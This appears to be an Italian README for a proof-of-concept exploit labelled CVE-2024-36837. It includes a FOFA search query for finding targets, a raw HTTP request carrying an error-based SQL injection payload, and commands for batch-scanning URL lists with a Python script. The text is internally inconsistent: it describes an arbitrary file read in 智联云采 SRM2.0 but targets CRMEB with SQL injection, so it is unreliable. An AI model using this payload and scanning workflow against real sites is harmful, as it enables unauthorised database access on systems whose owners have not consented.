
CVE-2024-36837 POC
#CVE-2024-36837
L'interfaccia runtimeLog/download di 智联云采 SRM2.0 presenta una vulnerabilità di lettura arbitraria dei file. Un attaccante non autenticato può sfruttare questa vulnerabilità per leggere file importanti del sistema (come file di configurazione del database, file di configurazione del sistema), file di configurazione del database, ecc., rendendo il sito web in uno stato estremamente insicuro.
Sintassi fofa: body="/wap/first/zsff/iconfont/iconfont.css" || body="CRMEB"
#POC:
GET /api/products?limit=20&priceOrder&salesOrder&selectId=GTID_SUBSET(CONCAT(0x7e,(SELECT+(ELT(3550=3550,md5(9753165)))),0x7e),3550) HTTP/1.1 Host: x.x.x.x User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_6) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.1.2 Safari/605.1.15 Connection: close Accept: / Accept-Language: en Accept-Encoding: gzip #Aggiungere http:// o https:// prima dell'URL python 11.py
#come usare python cve.py -h
#Rilevamento batch L'URL in url.txt deve avere http:// o https:// python cve.py -f url.txt
#Rilevamento singolo L'URL deve avere http:// o https:// python cve.py -u url